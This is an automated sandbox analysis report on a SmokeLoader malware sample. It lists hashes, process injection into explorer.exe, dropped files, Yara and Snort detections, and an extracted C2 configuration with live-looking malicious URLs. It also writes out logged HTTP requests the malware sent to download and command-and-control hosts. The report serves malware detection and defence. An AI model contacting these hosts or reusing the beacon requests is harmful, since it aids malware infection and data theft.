Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 719838
MD5: 28167cbfd672c0fc70358d19de3826eb
SHA1: 92112f7c9a68e28d86c3762871525647f55bb337
SHA256: 86533589ed7705b7bb28f85f19e45d9519023bcc53422f33d13b6023bab7ab21
Tags: exe
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs

Classification

  • System is w10x64
  • file.exe (PID: 712 cmdline: C:\Users\user\Desktop\file.exe MD5: 28167CBFD672C0FC70358D19DE3826EB)
    • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 586.exe (PID: 1792 cmdline: C:\Users\user\AppData\Local\Temp\586.exe MD5: 5C3FAFBD0E6546D41F902B129CE27E7B)
  • ichffhi (PID: 1044 cmdline: C:\Users\user\AppData\Roaming\ichffhi MD5: 28167CBFD672C0FC70358D19DE3826EB)
  • cleanup
{"C2 list": ["http://citnet.ru/tmp/", "http://ekcentric.com/tmp/", "http://cracker.biz/tmp/"]}
Source | Rule | Description | Author | Strings
00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x3a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x7a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000002.00000002.431249824.0000000000643000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x4da7:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      No Sigma rule has matched

      AV Detection

      Source: file.exe | ReversingLabs: Detection: 43%
      Source: C:\Users\user\AppData\Roaming\ichffhi | ReversingLabs: Detection: 43%
      Source: file.exe | Joe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\ichffhi | Joe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\586.exe | Joe Sandbox ML: detected
      Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://citnet.ru/tmp/", "http://ekcentric.com/tmp/", "http://cracker.biz/tmp/"]}
      Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: unknown | HTTPS traffic detected: 87.250.250.50:443 -> 192.168.2.5:49711 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.5:49730 version: TLS 1.2
      Source: Binary string: C:\fuw\riboz.pdb source: 586.exe, 586.exe, 00000006.00000000.556358879.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe, 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe.1.dr
      Source: Binary string: C:\tuvapehib\puvomufewade\sehem\jizef.pdb source: file.exe, ichffhi.1.dr
      Source: Binary string: s_C:\fuw\riboz.pdb source: 586.exe, 00000006.00000000.556358879.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe, 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe.1.dr

      Networking

      Source: C:\Windows\explorer.exe | Domain query: thepokeway.nl
      Source: C:\Windows\explorer.exe | Network Connect: 213.227.155.16 80
      Source: C:\Windows\explorer.exe | Domain query: gayworld.at
      Source: C:\Windows\explorer.exe | Domain query: disk.yandex.ru
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49695 -> 175.120.254.9:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49696 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49697 -> 195.158.3.162:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49697 -> 195.158.3.162:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49698 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49699 -> 195.158.3.162:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49700 -> 211.171.233.126:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49700 -> 211.171.233.126:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49701 -> 211.171.233.126:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49702 -> 175.120.254.9:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49702 -> 175.120.254.9:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49703 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49703 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49705 -> 185.95.186.58:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49706 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49707 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49708 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49708 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49709 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49710 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49710 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49712 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 211.171.233.129:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 175.120.254.9:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49717 -> 175.120.254.9:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 175.120.254.9:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49719 -> 211.171.233.126:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49720 -> 109.102.255.230:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49721 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49721 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49722 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 211.171.233.129:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49724 -> 195.158.3.162:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49725 -> 175.120.254.9:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49725 -> 175.120.254.9:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49726 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49727 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49728 -> 123.213.233.194:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49729 -> 175.120.254.9:80
      Source: Traffic | Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49731 -> 185.95.186.58:80
      Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49731 -> 185.95.186.58:80
      Source: Malware configuration extractor | URLs: http://citnet.ru/tmp/
      Source: Malware configuration extractor | URLs: http://ekcentric.com/tmp/
      Source: Malware configuration extractor | URLs: http://cracker.biz/tmp/
      Source: Joe Sandbox View | ASN Name: SKB-ASSKBroadbandCoLtdKR
      Source: Joe Sandbox View | ASN Name: RTDBucharestRomaniaRO
      Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
      Source: Joe Sandbox View | IP Address: 123.213.233.194
      Source: global traffic | HTTP traffic detected:
          GET /d/aS1IzKYGKL0Ctw HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Host: disk.yandex.ru
      Source: global traffic | HTTP traffic detected:
          GET /upload/index.php HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Host: thepokeway.nl
      Source: global traffic | HTTP traffic detected:
          POST /tmp/ HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://vqhcrffxeq.org/
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Length: 174
          Host: gayworld.at
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownTCP traffic detected without corresponding DNS query: 213.227.155.16
      Source: explorer.exe, 00000001.00000000.360118573.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340593765.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.311877764.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqhcrffxeq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: gayworld.at
      Source: unknownDNS traffic detected: queries for: gayworld.at
      Source: global trafficHTTP traffic detected: GET /d/aS1IzKYGKL0Ctw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: disk.yandex.ru
      Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
      Source: unknownHTTPS traffic detected: 87.250.250.50:443 -> 192.168.2.5:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.5:49730 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      Source: Yara matchFile source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: file.exe, 00000000.00000002.378803920.000000000064A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      System Summary

      Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000002.00000002.431249824.0000000000643000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000002.00000002.431249824.0000000000643000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004022030_2_00402203
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004022090_2_00402209
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040221B0_2_0040221B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021E70_2_004021E7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ECD00_2_0040ECD0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004168A90_2_004168A9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417D4E0_2_00417D4E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E6480_2_0040E648
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E210_2_00415E21
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004163650_2_00416365
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060226A0_2_0060226A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006022700_2_00602270
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060224E0_2_0060224E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006022820_2_00602282
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004022032_2_00402203
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004022092_2_00402209
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040221B2_2_0040221B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004021E72_2_004021E7
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040ECD02_2_0040ECD0
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004168A92_2_004168A9
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00417D4E2_2_00417D4E
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040E6482_2_0040E648
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00415E212_2_00415E21
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004163652_2_00416365
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0053224E2_2_0053224E
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_005322702_2_00532270
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0053226A2_2_0053226A
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_005322822_2_00532282
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_0040ECD06_2_0040ECD0
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004168A96_2_004168A9
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_00417D4E6_2_00417D4E
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_0040E6486_2_0040E648
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_00415E216_2_00415E21
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004163656_2_00416365
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_00416FA16_2_00416FA1
      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00409480 appears 32 times
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: String function: 00409480 appears 44 times
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: String function: 00409480 appears 32 times
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040143B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040143B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401446 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401446
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040145D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401460 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401460
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040146B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040146B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402203 NtOpenKey,0_2_00402203
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402209 NtOpenKey,0_2_00402209
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040221B NtOpenKey,0_2_0040221B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F3B NtClose,RtlInitUnicodeString,CreateFileMappingW,OpenProcessToken,NtOpenProcess,towlower,0_2_00402F3B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021E7 NtOpenKey,0_2_004021E7
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040143B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_0040143B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00401446 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_00401446
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_0040145D
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00401460 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_00401460
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040146B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_0040146B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402203 NtOpenKey,2_2_00402203
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402209 NtOpenKey,2_2_00402209
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040221B NtOpenKey,2_2_0040221B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402F3B NtClose,RtlInitUnicodeString,CreateFileMappingW,OpenProcessToken,NtOpenProcess,NtCreateSection,NtAllocateVirtualMemory,NtDuplicateObject,NtOpenKey,NtEnumerateKey,RtlCreateUserThread,strstr,2_2_00402F3B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004021E7 NtOpenKey,2_2_004021E7
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
